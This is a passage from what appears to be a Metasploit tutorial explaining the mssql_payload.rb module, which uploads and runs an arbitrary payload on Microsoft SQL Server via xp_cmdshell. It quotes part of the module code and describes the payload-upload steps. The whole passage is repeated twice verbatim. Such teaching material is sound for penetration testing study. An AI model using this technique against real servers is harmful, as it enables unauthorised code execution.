One thing to caveat is that I didn't need to put different commands in three different files however, if you think ahead you may want to reuse code and putting the hex2binary portions in mssql.rb made the most sense, plus HDM is a stickler for pretty code (love you buddy).
Let's first take a look at the mssql_payload.rb to get an idea of what we're looking at here.
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::MSSQL def initialize(info = {})
super(update_info(info, 'Name' => 'Microsoft SQL Server Payload Execution', 'Description' => %q{ This module will execute an arbitrary payload on a Microsoft SQL Server, using the Windows debug.com method for writing an executable to disk and the xp_cmdshell stored procedure. File size restrictions are avoided by incorporating the debug bypass method presented at Defcon 17 by SecureState. Note that this module will leave a metasploit payload in the Windows System32 directory which must be manually deleted once the attack is completed. }, 'Author' => [ 'David Kennedy "ReL1K" 'License' => MSF_LICENSE, 'Version' => '$Revision: 7236 $', 'References' => [ [ 'OSVDB', '557'], [ 'CVE', '2000-0402'], [ 'BID', '1281'], [ 'URL', 'http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf'], ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0 )) end
def exploit
debug = false # enable to see the output
if(not mssql_login_datastore) print_status("Invalid SQL Server credentials") return end
While this may seem extremely simple and not a ton of code, there is actually a lot of things that are going on behind the scenes that we'll investigate later. Let's break down this file for now. If you look at the top half, everything should look relatively the same right? If you look at the references section, this area is simply for additional information about the attack or original exploit vector. The platform of "win" is specifying Windows platforms and the Targets is simply a section if we wanted to add operating systems or in this example if we had to do something different based off of SQL server we could add SQL 2000, SQL 2005, and SQL 2008. The DefaultTarget allows us to specify a default for this attack, so if we used SQL 2000, SQL 2005, and SQL 2008, we could have it default to 2005, people could change it through SET TARGET 1 2 3 but if they didn't 2005 would be the system attacked.
Moving to the "def exploit" this begins our actual code for the exploit, one thing to note from the above if you look at the very top we included "Msf::Exploit::Remote::MSSQL" this will include a variety of items we can call from the Exploit, Remote, and MSSQL portions. Specifically we are calling from the mssql.rb in the lib/msf/core/exploits area.
The first line debug = false specifies if we should portray information back to you or not, typically we don't want this and isn't needed and would be quite a bit of information portrayed back to the Metasploit user. If something isn't working, simply change this to debug=true and you'll see everything that Metasploit is doing. Moving on to the next line, this is the most complex portion of the entire attack. This one liner here is really multiple lines of code being pulled from mssql.rb. We'll get into this one in a second, but to explain what is actually there:
mssql_upload_exec (function defined in mssql.rb for uploading an executable through SQL to the underlying operating system)
Msf::Util::EXE.to_win32pe(framework,payload.encoded) = create a metasploit payload based off of what you specified, make it an executable and encode it with default encoding
debug = call the debug function is it on or off?
Lastly the handler will handle the connections from the payload in the background so we can accept a metasploit payload.
The disconnect portion of the code ceases the connection from the MSSQL server.
Now that we have walked through this portion, we will break down the next section in the mssql.rb to find out exactly what this attack was doing.
One thing to caveat is that I didn't need to put different commands in three different files however, if you think ahead you may want to reuse code and putting the hex2binary portions in mssql.rb made the most sense, plus HDM is a stickler for pretty code (love you buddy).
Let's first take a look at the mssql_payload.rb to get an idea of what we're looking at here.
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::MSSQL def initialize(info = {})
super(update_info(info, 'Name' => 'Microsoft SQL Server Payload Execution', 'Description' => %q{ This module will execute an arbitrary payload on a Microsoft SQL Server, using the Windows debug.com method for writing an executable to disk and the xp_cmdshell stored procedure. File size restrictions are avoided by incorporating the debug bypass method presented at Defcon 17 by SecureState. Note that this module will leave a metasploit payload in the Windows System32 directory which must be manually deleted once the attack is completed. }, 'Author' => [ 'David Kennedy "ReL1K" 'License' => MSF_LICENSE, 'Version' => '$Revision: 7236 $', 'References' => [ [ 'OSVDB', '557'], [ 'CVE', '2000-0402'], [ 'BID', '1281'], [ 'URL', 'http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf'], ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0 )) end
def exploit
debug = false # enable to see the output
if(not mssql_login_datastore) print_status("Invalid SQL Server credentials") return end
While this may seem extremely simple and not a ton of code, there is actually a lot of things that are going on behind the scenes that we'll investigate later. Let's break down this file for now. If you look at the top half, everything should look relatively the same right? If you look at the references section, this area is simply for additional information about the attack or original exploit vector. The platform of "win" is specifying Windows platforms and the Targets is simply a section if we wanted to add operating systems or in this example if we had to do something different based off of SQL server we could add SQL 2000, SQL 2005, and SQL 2008. The DefaultTarget allows us to specify a default for this attack, so if we used SQL 2000, SQL 2005, and SQL 2008, we could have it default to 2005, people could change it through SET TARGET 1 2 3 but if they didn't 2005 would be the system attacked.
Moving to the "def exploit" this begins our actual code for the exploit, one thing to note from the above if you look at the very top we included "Msf::Exploit::Remote::MSSQL" this will include a variety of items we can call from the Exploit, Remote, and MSSQL portions. Specifically we are calling from the mssql.rb in the lib/msf/core/exploits area.
The first line debug = false specifies if we should portray information back to you or not, typically we don't want this and isn't needed and would be quite a bit of information portrayed back to the Metasploit user. If something isn't working, simply change this to debug=true and you'll see everything that Metasploit is doing. Moving on to the next line, this is the most complex portion of the entire attack. This one liner here is really multiple lines of code being pulled from mssql.rb. We'll get into this one in a second, but to explain what is actually there:
mssql_upload_exec (function defined in mssql.rb for uploading an executable through SQL to the underlying operating system)
Msf::Util::EXE.to_win32pe(framework,payload.encoded) = create a metasploit payload based off of what you specified, make it an executable and encode it with default encoding
debug = call the debug function is it on or off?
Lastly the handler will handle the connections from the payload in the background so we can accept a metasploit payload.
The disconnect portion of the code ceases the connection from the MSSQL server.
Now that we have walked through this portion, we will break down the next section in the mssql.rb to find out exactly what this attack was doing.
